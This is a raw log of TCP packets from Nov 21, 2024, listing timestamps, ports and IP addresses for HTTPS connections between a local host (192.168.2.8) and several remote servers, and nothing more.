                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.959866047 CET49813443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.959872961 CET4434981320.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.959887981 CET49813443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.007343054 CET4434981320.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.011002064 CET49813443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.033703089 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.033746004 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.033816099 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.034111977 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.034132957 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.059601068 CET4434980713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.059628963 CET4434980713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.059637070 CET4434980713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.059664011 CET4434980713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.059686899 CET49807443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.059689999 CET4434980713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.059712887 CET4434980713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.059729099 CET49807443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.059753895 CET49807443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.232001066 CET4434980713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.232036114 CET4434980713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.232096910 CET49807443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.232135057 CET4434980713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.232151985 CET49807443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.232171059 CET49807443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.277344942 CET4434980713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.277370930 CET4434980713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.277435064 CET49807443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.277463913 CET4434980713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.277482033 CET49807443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.277496099 CET49807443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.298607111 CET4434981240.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.299554110 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.299591064 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.299602985 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.299640894 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.299666882 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.299693108 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.299704075 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.299716949 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.299727917 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.299760103 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.319747925 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.319799900 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.319911003 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.320478916 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.320497036 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.323556900 CET49818443192.168.2.820.189.173.2
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.323585033 CET4434981820.189.173.2192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.323678017 CET49818443192.168.2.820.189.173.2
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.324055910 CET49819443192.168.2.820.189.173.2
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.324086905 CET4434981920.189.173.2192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.324150085 CET49819443192.168.2.820.189.173.2
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.325479031 CET49819443192.168.2.820.189.173.2
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.325501919 CET4434981920.189.173.2192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.325923920 CET49818443192.168.2.820.189.173.2
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.054177999 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.054212093 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.054255962 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.054281950 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.054311991 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.054372072 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.068428993 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.068460941 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.068506956 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.068526030 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.068547010 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.068566084 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.082856894 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.082884073 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.082940102 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.082957983 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.082968950 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.082998037 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.094197989 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.094223976 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.094285011 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.094300985 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.094340086 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.106862068 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.106888056 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.106967926 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.106992960 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.107019901 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.107156992 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.116692066 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.116782904 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.116799116 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.116813898 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.116842985 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.116863012 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.117508888 CET49806443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.117527008 CET4434980613.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.157202005 CET4434981240.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.157234907 CET4434981240.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.157243967 CET4434981240.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.157315016 CET4434981240.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.157362938 CET49812443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.157409906 CET4434981240.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.157433033 CET4434981240.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.157438993 CET49812443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.157481909 CET49812443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.157887936 CET49812443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.157928944 CET4434981240.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.157955885 CET49812443192.168.2.840.126.53.18
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.157973051 CET4434981240.126.53.18192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.482163906 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.482253075 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.551944017 CET49820443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.551980019 CET4434982013.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.552061081 CET49820443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.552366018 CET49821443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.552412033 CET4434982113.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.552495003 CET49821443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.552531958 CET49822443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.552551031 CET4434982213.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.552588940 CET49822443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.552705050 CET49823443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.552730083 CET4434982313.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.552787066 CET49823443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.552897930 CET49824443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.552968025 CET4434982413.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.553019047 CET49824443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.553069115 CET49825443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.553098917 CET4434982513.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.553144932 CET49825443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.553361893 CET49820443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.553375006 CET4434982013.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.553621054 CET49821443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.553632975 CET4434982113.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.584603071 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.584652901 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.584667921 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.584686041 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.584711075 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.622092009 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.626830101 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.626852989 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.626892090 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.626926899 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.626944065 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.626966000 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.631474972 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.631493092 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.631537914 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.631550074 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.631575108 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.631589890 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.647038937 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.647058010 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.647103071 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.647140980 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.647159100 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.647584915 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.660666943 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.660687923 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.660773039 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.660773039 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.660785913 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.660826921 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.681854963 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.681895971 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.681934118 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.681969881 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.681988001 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.681988955 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.682029963 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.684977055 CET49817443192.168.2.820.25.227.174
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.685012102 CET4434981720.25.227.174192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.733171940 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.733192921 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.733253956 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.733268023 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.733279943 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.733727932 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.744545937 CET4434970713.107.246.63192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.744755030 CET49707443192.168.2.813.107.246.63
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.755825043 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.755844116 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.755909920 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.755925894 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.755955935 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.755968094 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.776802063 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.776824951 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.776880026 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.776897907 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.776911974 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.776952028 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.795841932 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.795860052 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.795912981 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.795922995 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.795937061 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.796060085 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.812180042 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.812186956 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.812267065 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.812277079 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.812320948 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.834516048 CET4434981820.189.173.2192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.834600925 CET4434981820.189.173.2192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.834997892 CET49818443192.168.2.820.189.173.2
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:44.836199045 CET49818443192.168.2.820.189.173.2
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.300960064 CET49821443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.300973892 CET4434982113.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.301357031 CET4434982113.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.301893950 CET49821443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.301955938 CET4434982113.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.302066088 CET49821443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.323522091 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.323544025 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.323621035 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.323641062 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.323664904 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.323682070 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.330636978 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.330653906 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.330717087 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.330725908 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.330771923 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.338704109 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.338731050 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.338795900 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.338803053 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.338818073 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.341351986 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.343333960 CET4434982113.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.346635103 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.346653938 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.346719027 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.346725941 CET4434981449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.346767902 CET49814443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.350150108 CET4434982513.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.350574970 CET49825443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.350600958 CET4434982513.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.351840019 CET4434982513.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.351896048 CET49825443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.351922989 CET4434982413.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.352190971 CET4434982313.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.352411985 CET49825443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.352482080 CET4434982513.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.352852106 CET49824443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.352895021 CET4434982413.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.352943897 CET49823443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.352957010 CET4434982313.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.353024960 CET4434982213.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.353241920 CET49825443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.353254080 CET4434982513.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.353838921 CET49822443192.168.2.813.107.246.40
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.353851080 CET4434982213.107.246.40192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:45.354074001 CET4434982313.107.246.40192.168.2.8
